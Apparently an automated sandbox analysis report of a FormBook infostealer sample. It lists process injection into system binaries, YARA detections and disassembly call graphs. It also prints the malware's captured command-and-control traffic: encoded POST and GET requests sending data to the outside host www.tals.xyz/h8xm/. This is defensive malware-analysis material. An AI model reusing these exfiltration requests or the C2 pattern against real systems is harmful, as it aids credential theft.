                                                                                      Data Ascii: xTAAuwsvOZ8+VofC1XaimeCl8JMWZhjihH+AH8MuvHr8EjTKg9wUDZp0O3PubXJGbBJ0t6rzeeGFvBJF8GzAXAnIU9IZZidQ5c+vFU+GvF+V5REdox0vDYb2mds5z8H75k4O/8/I4PAAAAAElFTkSuQmCC"> <link rel="icon" type="image/x-icon" href="data:image/x-icon;base64,AAABAAEAEBAAA
                                                                                      Jan 10, 2025 19:54:59.022933960 CET552INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 47 53 51 43 35 74 6f 6c 52 44 2f 5a 49 38 51 2f 32 53 50 45 50 39 6b 6a 78 44 2f 5a 49 38 51 2f 32 53 50 45 50 39 6b 6a 78 44 2f 5a 35 51 51 2f 32 4f 52
                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGSQC5tolRD/ZI8Q/2SPEP9kjxD/ZI8Q/2SPEP9kjxD/Z5QQ/2ORDqEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABijwx3aJUQ/2SPEP9kjxD/ZI8Q/2SPEP9kjxD/ZI8Q/2iVEP9ljQ5+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAY4gAKWWRDe1mkxH/ZI8Q/2SPEP9kjxD/ZI8Q/2aTE
                                                                                      Jan 10, 2025 19:54:59.022943974 CET1236INData Raw: 20 20 20 20 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 49 6e 74 65 6c 6f 4c 6f 63 61 6c 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3a 20 75 72 6c 28 64 61 74 61
                                                                                      Data Ascii: @font-face { font-family: 'InteloLocal'; src: url(data:application/font-woff2;charset=utf-8;base64,d09GMgABAAAAALDAABIAAAACOFwAALBWAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP0ZGVE0cGoEqG4LpJByweAZgAIcGCIEYCZoWEQgKhO1IhJwbC4dk
                                                                                      Jan 10, 2025 19:54:59.022957087 CET1236INData Raw: 71 45 6c 44 76 6c 74 76 49 42 63 41 6e 42 4a 66 51 34 70 37 72 59 37 77 48 4b 62 69 6e 4d 2b 54 46 36 6d 4e 61 70 77 47 64 6c 4a 36 46 70 77 41 39 53 67 2b 4c 72 62 41 67 4d 45 2f 79 66 2b 4e 36 30 36 69 61 50 4a 51 36 4f 55 64 74 6c 53 6f 51 51
                                                                                      Data Ascii: qElDvltvIBcAnBJfQ4p7rY7wHKbinM+TF6mNapwGdlJ6FpwA9Sg+LrbAgME/yf+N606iaPJQ6OUdtlSoQQCIVWidSTxGpMTVhV9+TvBjnNMKkFjhuhwDMMwRHQtJxpO3O+1/c9Oj0mQOzv4O7uIfVks34UMmjyrKaEoSVfdLF60+OXellypqjTaUnY2V/YZ9+Z7akkOGA9GonTXGoK8XfgQZa38JGOYkoGNg+6I/7o9vkybIu2m
                                                                                      Jan 10, 2025 19:54:59.027806997 CET1236INData Raw: 7a 50 2f 2f 46 72 53 2f 31 37 37 53 76 71 79 64 32 6e 47 47 43 47 45 4d 49 4d 59 68 4b 2f 73 78 50 63 4e 32 56 75 36 75 30 75 34 50 45 6f 6f 4a 59 51 53 67 6a 46 47 43 43 4f 4d 45 43 49 45 59 30 72 66 5a 31 76 75 38 78 67 75 2f 6f 38 4a 75 69 68
                                                                                      Data Ascii: zP//FrS/177Svqyd2nGGCGEMIMYhK/sxPcN2Vu6u0u4PEooJYQSgjFGCCOMECIEY0rfZ1vu8xgu/o8JuihXeSrMV/ljfj+tHurEHUmZnqodBQGVZtn6vX9sgnc/Y+rTtzXtdd9abWIEBd0RkbEeaHvz6Dftb2mo5tqvJ54SNIEGs4WVmRU4fXNCgF99KpQA4Jf3vBne/gnyk+v/h8DZwCctRrhAkVCUKFS0fKhAAapQGVSuHFWh


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      50192.168.2.55005013.248.169.48804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:55:04.473563910 CET765OUTPOST /h8xm/ HTTP/1.1
                                                                                      Host: www.tals.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.tals.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.tals.xyz/h8xm/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 4f 68 62 66 45 73 51 62 50 73 54 32 39 62 4c 6d 49 78 71 79 6d 73 49 49 4b 59 35 6c 64 49 2b 42 4e 45 54 73 58 39 67 79 64 6e 65 53 74 6a 70 4a 59 66 37 57 55 6d 4a 47 52 6d 6b 77 77 53 45 66 43 57 71 44 46 73 62 6d 75 44 2f 49 6c 73 35 77 36 6c 58 4d 72 39 65 53 38 5a 44 75 65 76 73 46 43 65 78 76 70 2b 38 68 76 5a 4e 76 6f 6b 4a 44 63 76 66 37 2b 2f 78 54 62 50 6d 53 65 75 66 4e 6c 6a 58 46 6d 31 6d 62 50 46 67 72 77 34 75 6c 57 4c 4f 78 4e 34 53 64 63 37 4d 2b 42 68 6b 6c 7a 47 30 56 33 32 54 4f 62 4d 79 36 51 78 54 4e 34 6a 37 35 2f 2f 39 36 6a 7a 67 39 4d 31 4d 74 75 6d 56 71 76 67 38 3d
                                                                                      Data Ascii: bbg=OhbfEsQbPsT29bLmIxqymsIIKY5ldI+BNETsX9gydneStjpJYf7WUmJGRmkwwSEfCWqDFsbmuD/Ils5w6lXMr9eS8ZDuevsFCexvp+8hvZNvokJDcvf7+/xTbPmSeufNljXFm1mbPFgrw4ulWLOxN4Sdc7M+BhklzG0V32TObMy6QxTN4j75//96jzg9M1MtumVqvg8=
                                                                                      Jan 10, 2025 19:55:04.939409018 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                      content-length: 0
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      51192.168.2.55005113.248.169.48804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:55:07.025955915 CET785OUTPOST /h8xm/ HTTP/1.1
                                                                                      Host: www.tals.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.tals.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.tals.xyz/h8xm/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 4f 68 62 66 45 73 51 62 50 73 54 32 2b 37 37 6d 4b 57 65 79 67 4d 49 4c 46 34 35 6c 58 6f 2b 46 4e 45 58 73 58 38 6c 35 64 56 36 53 6a 6a 35 4a 57 2b 37 57 42 6d 4a 47 5a 47 6b 78 2f 79 46 54 43 57 57 39 46 74 6e 6d 75 44 72 49 6c 75 78 77 37 57 2f 50 74 74 65 51 30 35 44 73 51 50 73 46 43 65 78 76 70 2b 6f 4c 76 5a 6c 76 30 45 5a 44 4e 2b 66 34 39 2f 78 51 4e 66 6d 53 54 4f 66 33 6c 6a 57 71 6d 30 36 6c 50 48 6f 72 77 39 4b 6c 57 66 36 32 55 6f 53 62 59 37 4e 36 4f 6b 52 74 38 55 6b 6b 71 6e 54 4a 4c 4b 6d 39 63 6e 69 6e 69 42 7a 52 73 66 52 43 7a 67 6f 4b 64 46 74 45 30 46 46 61 78 33 71 70 6f 65 64 53 54 6b 67 55 79 4c 4d 77 2b 71 4c 36 4d 65 66 6b
                                                                                      Data Ascii: bbg=OhbfEsQbPsT2+77mKWeygMILF45lXo+FNEXsX8l5dV6Sjj5JW+7WBmJGZGkx/yFTCWW9FtnmuDrIluxw7W/PtteQ05DsQPsFCexvp+oLvZlv0EZDN+f49/xQNfmSTOf3ljWqm06lPHorw9KlWf62UoSbY7N6OkRt8UkkqnTJLKm9cniniBzRsfRCzgoKdFtE0FFax3qpoedSTkgUyLMw+qL6Mefk
                                                                                      Jan 10, 2025 19:55:07.682120085 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                      content-length: 0
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      52192.168.2.55005213.248.169.48804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:55:09.580379963 CET1802OUTPOST /h8xm/ HTTP/1.1
                                                                                      Host: www.tals.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.tals.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.tals.xyz/h8xm/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 4f 68 62 66 45 73 51 62 50 73 54 32 2b 37 37 6d 4b 57 65 79 67 4d 49 4c 46 34 35 6c 58 6f 2b 46 4e 45 58 73 58 38 6c 35 64 56 79 53 6a 51 42 4a 57 5a 58 57 54 57 4a 47 59 47 6b 30 2f 79 45 4a 43 53 43 35 46 74 72 32 75 42 54 49 33 37 39 77 7a 48 2f 50 6b 74 65 51 72 4a 44 74 65 76 73 51 43 59 52 72 70 2b 34 4c 76 5a 6c 76 30 47 52 44 64 66 66 34 78 66 78 54 62 50 6e 47 65 75 65 35 6c 6a 65 51 6d 33 58 65 50 32 49 72 31 74 36 6c 51 71 4f 32 4c 34 53 5a 64 37 4e 63 4f 6b 56 69 38 55 35 64 71 6e 32 63 4c 4e 53 39 5a 47 44 63 6d 54 48 4a 79 70 64 55 37 6a 30 4d 4c 69 64 6b 71 33 4e 55 7a 33 37 47 67 65 35 52 52 67 63 75 34 62 64 75 73 75 65 6f 45 6f 4f 78 7a 2f 4b 76 6b 63 77 75 67 44 50 52 4c 33 6a 55 32 75 41 49 4b 6f 75 2f 69 73 57 7a 52 2b 62 7a 31 65 4c 74 65 66 32 68 54 45 34 39 4d 2f 6d 41 63 38 6d 4f 4d 37 6e 61 30 49 50 35 57 72 30 37 50 6f 35 6c 65 67 56 6e 64 44 58 34 39 4e 58 64 74 4a 6d 69 58 2b 6d 78 5a 53 43 59 54 58 58 2f 4c 45 2b 30 7a 39 78 46 59 39 62 43 59 39 66 74 71 52 [TRUNCATED]
                                                                                      Data Ascii: bbg=OhbfEsQbPsT2+77mKWeygMILF45lXo+FNEXsX8l5dVySjQBJWZXWTWJGYGk0/yEJCSC5Ftr2uBTI379wzH/PkteQrJDtevsQCYRrp+4LvZlv0GRDdff4xfxTbPnGeue5ljeQm3XeP2Ir1t6lQqO2L4SZd7NcOkVi8U5dqn2cLNS9ZGDcmTHJypdU7j0MLidkq3NUz37Gge5RRgcu4bdusueoEoOxz/KvkcwugDPRL3jU2uAIKou/isWzR+bz1eLtef2hTE49M/mAc8mOM7na0IP5Wr07Po5legVndDX49NXdtJmiX+mxZSCYTXX/LE+0z9xFY9bCY9ftqRLyCx2oEMRv61WjLvZWsmpIi78OBVMnOl0mC3DopCok2GzTzbe6d4IYdOwm3oh8uouuXimfGzB49Psexl7TR7HREY9Xkois/DKNF5lbXzi7nTd5salX7sD11H8IZPPEBSGSGgJ3TsW/vV/2Kh00OsphlgBoB8eP77SBUqby0TLoTRjwUweVviQUtpUBZvLsQOl6KZ9omn2mWzyax/KE6RCDVhH5A3d9cJoEyj9QptAQLit7/99rk0q9mKJaE5WlLIqodPhBTnwHoInn81yKbcwO4zkkIYm9Y6FAQkGWQqLFkYd9rjz1eR2Q48wWmzsaVC/OEjoyw2mgJCxAgIRHQAJX5+lrX4YK8YRJd9HWQ0mvdeZgzmT3YcrwVHcVLsntXc+aN+1BHm1BgJlIEJqvLMajTySiB+h6F/ac61YqeWlmDxb0GGv3rSzaNXrizTBNbWmjVIfVve58gUd8u9KdhO+BR7MtPAMTu9NP7N3VOIHExvPmV9iGYq/P8odNhL3+dgL0ExJLqQKyhLa/gpgBnM838dct5UgK2Q4mHoS+LgrFl4jMH+KPsUObCoSYeBwssj94rNUGl8QnWX/DdNgkuRDQ1GLXrCJrUfd8OuNVxEC/uKKVbXPzi5YrprZnJrZaDnjDEHz9eS0bNhCujWZXx5A1oTjdvWjfNeds [TRUNCATED]
                                                                                      Jan 10, 2025 19:55:10.037511110 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                      content-length: 0
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      53192.168.2.55005313.248.169.48804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:55:12.276408911 CET519OUTGET /h8xm/?bbg=Djz/HatsL8//q4jEHVXjpeAGEqEdbJOsV0SUedpbc1iwsSAKW9bJKhlacHYz2CYne1ysE/rGqXnA3+5LllbTg/a50arMCuQoFYEtuqwmipYtkk9+U+/725Z0eP7TAeqp5A==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.tals.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:55:12.760904074 CET387INHTTP/1.1 200 OK
                                                                                      content-type: text/html
                                                                                      date: Fri, 10 Jan 2025 18:55:12 GMT
                                                                                      content-length: 266
                                                                                      connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 62 62 67 3d 44 6a 7a 2f 48 61 74 73 4c 38 2f 2f 71 34 6a 45 48 56 58 6a 70 65 41 47 45 71 45 64 62 4a 4f 73 56 30 53 55 65 64 70 62 63 31 69 77 73 53 41 4b 57 39 62 4a 4b 68 6c 61 63 48 59 7a 32 43 59 6e 65 31 79 73 45 2f 72 47 71 58 6e 41 33 2b 35 4c 6c 6c 62 54 67 2f 61 35 30 61 72 4d 43 75 51 6f 46 59 45 74 75 71 77 6d 69 70 59 74 6b 6b 39 2b 55 2b 2f 37 32 35 5a 30 65 50 37 54 41 65 71 70 35 41 3d 3d 26 34 48 70 68 3d 74 58 43 58 6b 70 4b 50 54 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?bbg=Djz/HatsL8//q4jEHVXjpeAGEqEdbJOsV0SUedpbc1iwsSAKW9bJKhlacHYz2CYne1ysE/rGqXnA3+5LllbTg/a50arMCuQoFYEtuqwmipYtkk9+U+/725Z0eP7TAeqp5A==&4Hph=tXCXkpKPT"}</script></head></html>


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:13:51:05
                                                                                      Start date:10/01/2025
                                                                                      Path:C:\Users\user\Desktop\OVZizpEU7Q.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\OVZizpEU7Q.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:1'786'368 bytes
                                                                                      MD5 hash:B5C6AC313FA5167296FBE879F26C4E0F
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:2
                                                                                      Start time:13:51:06
                                                                                      Start date:10/01/2025
                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\OVZizpEU7Q.exe"
                                                                                      Imagebase:0xf30000
                                                                                      File size:46'504 bytes
                                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2689551851.0000000006FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2685415495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2686604210.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:13:51:06
                                                                                      Start date:10/01/2025
                                                                                      Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:1'658'880 bytes
                                                                                      MD5 hash:43F9E491CFEB42E75ED6C50912305629
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Avira
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:6
                                                                                      Start time:13:51:37
                                                                                      Start date:10/01/2025
                                                                                      Path:C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe"
                                                                                      Imagebase:0x810000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4762982458.00000000062F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4758462130.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:7
                                                                                      Start time:13:51:41
                                                                                      Start date:10/01/2025
                                                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\SysWOW64\choice.exe"
                                                                                      Imagebase:0x1e0000
                                                                                      File size:28'160 bytes
                                                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4758299557.0000000004D60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4758261090.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4757299419.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:8
                                                                                      Start time:13:52:04
                                                                                      Start date:10/01/2025
                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                      Imagebase:0x7ff79f9e0000
                                                                                      File size:676'768 bytes
                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:3.6%
                                                                                        Dynamic/Decrypted Code Coverage:7.9%
                                                                                        Signature Coverage:7.1%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:78
                                                                                        execution_graph 108629 ac520c 108632 aecbd0 108629->108632 108631 ac5211 108650 aebe50 _wcslen 108632->108650 108633 aec168 108671 aea905 LocalFree 108633->108671 108636 aebffd StrStrIW 108636->108650 108637 aec78e CloseServiceHandle 108637->108650 108638 aec706 StrStrIW 108638->108650 108639 aec72b StrStrIW 108639->108650 108641 aebf68 StrStrIW 108641->108650 108642 aec399 StrStrIW 108647 aec3a9 108642->108647 108642->108650 108643 aebf7e 108646 aec7e4 StartServiceW 108643->108646 108648 aec36b OpenServiceW 108643->108648 108645 aec0fd CloseServiceHandle 108645->108650 108646->108650 108647->108631 108648->108650 108649 aec65a ChangeServiceConfigW 108649->108650 108651 aebfe9 108649->108651 108650->108631 108650->108632 108650->108633 108650->108636 108650->108637 108650->108638 108650->108639 108650->108641 108650->108642 108650->108643 108650->108645 108650->108646 108650->108649 108650->108651 108652 acce90 108650->108652 108670 aea350 CloseServiceHandle 108650->108670 108672 ac5d20 108650->108672 108651->108631 108662 accc9b _wcslen 108652->108662 108653 acd426 108656 acd8a1 CloseHandle 108653->108656 108657 acd42a CloseHandle 108653->108657 108654 acd5c5 CreateFileW 108654->108662 108655 acd729 GetFileSizeEx 108655->108656 108655->108662 108656->108662 108657->108662 108658 acd903 108665 accc92 108658->108665 108668 affdfc 40 API calls 108658->108668 108659 accd5c lstrcmpiW 108659->108662 108661 accca0 lstrcmpiW 108661->108662 108662->108650 108662->108652 108662->108653 108662->108654 108662->108655 108662->108656 108662->108657 108662->108658 108662->108659 108662->108661 108663 acd049 SetFilePointerEx 108662->108663 108662->108665 108666 ac5d20 VirtualAlloc VirtualFree 108662->108666 108667 acd378 CloseHandle 108662->108667 108669 accfbb GetFileTime 108662->108669 108677 ac8937 VirtualAlloc VirtualFree 108662->108677 108678 ac8470 VirtualAlloc VirtualFree 108662->108678 108663->108662 108665->108650 108666->108662 108667->108662 108668->108658 108669->108662 108670->108650 108671->108651 108674 ac5d22 108672->108674 108673 ac5d39 VirtualAlloc 108673->108674 108674->108650 108674->108673 108676 ac5d46 VirtualFree 108674->108676 108676->108650 108677->108662 108678->108662 108679 43fe27 108692 41f944 108679->108692 108681 43fe3d 108682 43fe53 108681->108682 108683 43febe 108681->108683 108781 409e5d 60 API calls 108682->108781 108701 40fce0 108683->108701 108685 43fe92 108687 44089c 108685->108687 108688 43fe9a 108685->108688 108783 469e4a 89 API calls 4 library calls 108687->108783 108782 46834f 59 API calls Mailbox 108688->108782 108689 43feb2 Mailbox 108693 41f950 108692->108693 108694 41f962 108692->108694 108784 409d3c 60 API calls Mailbox 108693->108784 108696 41f991 108694->108696 108697 41f968 108694->108697 108795 409d3c 60 API calls Mailbox 108696->108795 108785 420db6 108697->108785 108700 41f95a 108700->108681 108824 408180 108701->108824 108703 40fd3d 108704 4106f6 108703->108704 108706 44472d 108703->108706 108829 40f234 108703->108829 108946 469e4a 89 API calls 4 library calls 108704->108946 108947 469e4a 89 API calls 4 library calls 108706->108947 108709 444742 108710 44488d 108710->108709 108715 40fe4c 108710->108715 108953 47a2d9 85 API calls Mailbox 108710->108953 108711 40fe3e 108711->108710 108711->108715 108951 4566ec 59 API calls 2 library calls 108711->108951 108712 410517 108720 420db6 Mailbox 59 API calls 108712->108720 108721 4448f9 108715->108721 108769 444b53 108715->108769 108833 40837c 108715->108833 108716 4447d7 108716->108709 108949 469e4a 89 API calls 4 library calls 108716->108949 108717 444848 108952 4560ef 59 API calls 2 library calls 108717->108952 108730 410545 _memmove 108720->108730 108731 444917 108721->108731 108955 4085c0 59 API calls Mailbox 108721->108955 108724 444755 108724->108716 108948 40f6a3 341 API calls 108724->108948 108726 40fea4 108737 444ad6 108726->108737 108738 40ff32 108726->108738 108775 410179 Mailbox _memmove 108726->108775 108727 44486b 108732 409ea0 341 API calls 108727->108732 108728 4448b2 Mailbox 108728->108715 108954 4566ec 59 API calls 2 library calls 108728->108954 108739 420db6 Mailbox 59 API calls 108730->108739 108735 444928 108731->108735 108956 4085c0 59 API calls Mailbox 108731->108956 108732->108710 108733 420db6 59 API calls Mailbox 108744 40fdd3 108733->108744 108735->108775 108957 4560ab 59 API calls Mailbox 108735->108957 108966 469ae7 60 API calls 108737->108966 108741 420db6 Mailbox 59 API calls 108738->108741 108764 410106 _memmove 108739->108764 108745 40ff39 108741->108745 108744->108709 108744->108711 108744->108712 108744->108724 108744->108730 108744->108733 108753 44480c 108744->108753 108921 409ea0 108744->108921 108745->108704 108840 4109d0 108745->108840 108747 444a4d 108748 409ea0 341 API calls 108747->108748 108750 444a87 108748->108750 108750->108709 108961 4084c0 108750->108961 108752 40ffb2 108752->108704 108752->108730 108759 40ffe6 108752->108759 108950 469e4a 89 API calls 4 library calls 108753->108950 108757 444ab2 108965 469e4a 89 API calls 4 library calls 108757->108965 108766 410007 108759->108766 108967 408047 108759->108967 108764->108775 108780 410162 108764->108780 108945 409c90 59 API calls Mailbox 108764->108945 108765 410398 108765->108689 108766->108704 108768 444b24 108766->108768 108771 41004c 108766->108771 108767 420db6 59 API calls Mailbox 108767->108775 108971 409d3c 60 API calls Mailbox 108768->108971 108769->108709 108972 469e4a 89 API calls 4 library calls 108769->108972 108771->108704 108771->108769 108772 4100d8 108771->108772 108917 409d3c 60 API calls Mailbox 108772->108917 108774 444a1c 108778 420db6 Mailbox 59 API calls 108774->108778 108775->108704 108775->108747 108775->108757 108775->108765 108775->108767 108775->108774 108919 408740 68 API calls __cinit 108775->108919 108920 408660 68 API calls 108775->108920 108958 465937 68 API calls 108775->108958 108959 4089b3 69 API calls Mailbox 108775->108959 108960 409d3c 60 API calls Mailbox 108775->108960 108776 4100eb 108776->108704 108918 4082df 59 API calls Mailbox 108776->108918 108778->108747 108780->108689 108781->108685 108782->108689 108783->108689 108784->108700 108788 420dbe 108785->108788 108787 420dd8 108787->108700 108788->108787 108790 420ddc std::exception::exception 108788->108790 108796 42571c 108788->108796 108813 4233a1 DecodePointer 108788->108813 108814 42859b RaiseException 108790->108814 108792 420e06 108815 4284d1 58 API calls _free 108792->108815 108794 420e18 108794->108700 108795->108700 108797 425797 108796->108797 108806 425728 108796->108806 108822 4233a1 DecodePointer 108797->108822 108799 42579d 108823 428b28 58 API calls __getptd_noexit 108799->108823 108802 42575b RtlAllocateHeap 108803 42578f 108802->108803 108802->108806 